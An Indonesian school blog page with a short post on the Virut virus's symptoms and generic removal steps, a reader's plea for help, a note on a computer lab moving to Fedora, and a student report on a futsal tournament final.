Virus ini aktif dengan cara-cara yang “klasik” :
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Catatan : nama file yang terinfeksi di entri registri bisa bervariasi. virus memilih nama dari file yang terinfeksi di folder sistem.
Virus ini tidak menggunakan teknik rootkit atau teknik siluman (hehe..saya nggak tau ni terjemahan pastinya dari kalimat “stealth”), virus ini juga membuat file yang tidak mempunyai fungsi yang juga mengandung virus.
Bagaimana membersihkan virus ini dari komputer ?
1. Download Virut Remover
2. Boot sistem ke safe mode
3. Scan dengan removal tool diatas. kalau removal tool merekomendasikan untuk restart komputer turuti saja.
Dan berikut komentar dari user (pengguna komputer):
1. Ncienk, on September 21st, 2008 at 5:09 am Said:
Kang urang bogor lain?
Hehe..
Wah ngeliat artikelnya jd tertarik bwt mencoba nie…maklum dah 4x instal ulang plus repair, masih nongol tuh virus…
Td c dah bres pke ansav, kena smua tu virut win32, cuman gara2 di system, n harus di deleted, jd skrg ga bs login..
Pdhal dah di repair nie kang?
Gmna ya?
Apa hrs format ke 5kalie?
Hiks..bt euy…
Bru gw seumur hidup sehari 4 kalie format kompi…edan nie virus..
Tlg pencerahannya kang trims..
Huh…, kalau di bayang-bayangkan sih memang mengerikan. Hi…, takut….
Ke-bayang tidak jika semua file aplikasi (executable/ .exe) Anda telah terinfeksi olehnya. Wah…, tentu aplikasi/program Anda akan rusak olehnya. Nah…, marilah kita mencoba untuk teliti sejak dini terhadap file-file yang kita miliki!
Untuk serangannya, si Virut ini akan menambah Properties (byte….) dari aplikasi kita, kecuali berupa kompresan gabungan (kaya digabung dengan menggunakan Winrar) baru dia tidak bisa menyerang file tersebut. Untuk modul serangannya, si Virut ini akan langsung menyerang file aplikasi yang berhasil dia baca dari proses Real Time Infek-nya. Contohnya: Anda mempunyai game Flash pada FlashDisk, dan Anda mencolokkannya pada komputer yang sudah terinfeksi Virut sebelumnya, so’ dengan segera byte demi byte dari game Flash Anda akan bertambah sehingga ukurannya menjadi lebih besar (ukuran bite).
Memang sebelumnya si Norman Virus Control sudah mengenal berbagai seri dari si Virut ini. Tapi, karena beberapa waktu lalu NB saya terpaksa harus di-install ulang, maka saya pun terpaksa harus kehilangan Norman VC tersebut. Hik…, hik…, sedih.

Akhir kata, kenali gejalanya, hindari penyebarannya, Insya Allah Anda akan selamat (tentu orang juga tertolong).


Posted this by: Neo_BeKaBe

Migrasi ke Fedora

Virus..., virus..., bikin cape saja. Maka, untuk menghindarinya, saat ini di Lab. InternetMAN Model Palangkaraya menggunakan sistem operasi Fedora pada komputer. Hal ini di sambut baik oleh siswa(i) didiknya.
Perpindahan sistem operasi ini tentu memiliki sebab. Kira-kira apa ya? Anak-anak (siswa) yang biasanya ke ruang Komputer (entah Lab. Kom atau Lab. Internet) sering menghabiskan waktu mereka untuk bermain dengan komputer, tentu dengan game yang dibawa dari FlashDisknya. Hal ini sungguh menjengkelkan! Hal ini juga merupakan salah satu pemicu penyebaran virus (Windows OS). Dan mulai hari ini, seiring berubahnya tahun, akhirnya Fedora Operating System pun diterapkan.


Sampai jumpa Virus (Windows)....
Sampai ketemu di Linux....


Posted by Neo_BeKaBe

Monday, 5 January 2009

Laporan Berita (Juara Futsall) (BeKaBe)

Suara gemuruh supporter kian terdengar ramai di pagi itu. Teriakan, sanjungan dan komentar pun kian bertaburan menyambut pertandingan final MPK Cup 2008 MAN Model Palangkaraya yang diselenggarakan pada hari sabtu (20/12/08). Semua siswa dikerahkan untuk memberi dukungan di pertandingan itu. Pertandingan final ini mempertemukan antara kelas XII-IA-1 (BeKaBe) melawan kelas XI-IS-1.
Pertandingan berjalan sangat seru. Beberapa kali terjadi adu fisik dan beberapa peluang untuk saling mencetak gol silih berganti. Supporter yang menyaksikan pertandingan pun ikut terbawa atmosfir pertandingan yang menjurus pada permainan keras dan alot. Hingga babak pertama berakhir skor masih berakhir imbang tanpa gol. Memasuki babak kedua pertandingan yang diwarnai dengan benturan fisik ini pun masih berjalan seru dan menarik minat siswa yang bertepatan dengan pembagian raport semester. Babak kedua ini pun masih berakhir imbang tampa gol.
Setelah melewati dua babak dan berakhir imbang, wasit (Bpk. Sunandie) yang juga merupakan wasit senior Persepar ini langsung mengadakan tendangan adu pinalti untuk menentukan siapa pemenang di pertandingan final ini.
Penendang pertama dari kelas XII-IA-1(Bekabe-Red),Wahyu Akbar sedikit kurang tenang dalam penyelesaiannya sehingga gagal dalam mengeksekusi pinalti.
Kemudian disusul pula dengan gagalnya penendang pinalti dari kelas XI-IS-1. Dilanjutkan dengan penendang pinalti kedua. Fadli yang ditunjuk sebagai eksekutor juga gagal dalam menyelesaikan tendangan pinalti. Di sisi lain, penendang pinalti dari kelas XI-IS-1 juga gagal dalam mengeksekusi pinalti. Akhirnya penendang pinalti ketiga yang juga merupakan kapten Bekabe sekaligus Kapten MAN Model Palangkaraya (Andri,10) berhasil mengeksekusi pinalti dengan tenang dan membuat skor berubah menjadi 1-0 dan satu-satunya gol pinalti yang tercipta di pertandingan ini.
Sontak, seluruh suporter yang dikerahkan untuk menyaksikan pertandingan ini pun teriak histeris ketika melihat tim yang mereka dukung (BeKaBe-red) berhasil menjadi juara 1 di turnamen ini.
”Alhmadulillah, kami ucapkan pada Allah SWT yang telah memberikan kami segudang prestasi dalam setiap turnamen yang kami ikuti, tak lupa pula kami ucapkan terima kasih banyak kepada teman-teman yang sudah memberikan dukungannya baik berupa moril maupun materi. Kemenangan ini kami persembahkan kepada semua orang-orang yang telah memberikan dukungannya kepada kami dan kami berharap bisa lebih meningkatkan dan memajukan tim futsall MAN Model hingga Tingkat Nasional.” ungkap kapten Bekabe sekaligus Kapten MAN Model Palangkaraya ini.
Dengan Keberhasilan yang dicapai oleh anak-anak BeKaBe ini di cabang olahraga (Futsall), prestasi yang telah dicapai dari awal terbentuknya tim futsall BeKaBe tahun 2006 ini diantaranya :
1. Juara 1 MAN Model P.Raya Cup 2006
2. Juara 1 MAN Model P.Raya Cup 2007
3. Runner Up MAN Model P.Raya Cup 2008
4. Juara 1 MPK Cup MAN Model P.Raya 2008
5. Runner Up Telkomsel Cup 2008 se-Palangkaraya
6. Top Skorer(s) Telkomsel Cup 2008 se-Palangkaraya (Andri F / 13 gol)
”Semoga prestasi yang kami torehkan saat ini dapat menjadi sumber inspirasi dan motivasi bagi semua rekan-rekan serta adik kelas kami dalam turnamen-turnamen bergengsi lainnya untuk menjadi juara dan mengangkat nama baik serta martabat sekolah kita (MAN Model-red) di mata masyarakat umum khususnya warga Palangkaraya.” Ungkap Kapten Tim MAN Model Palangkaraya yang juga pernah menjadi Kapten Tim Sepak Bola MTsN 1 Model Palangkaraya ini dengan merendah. (Alul)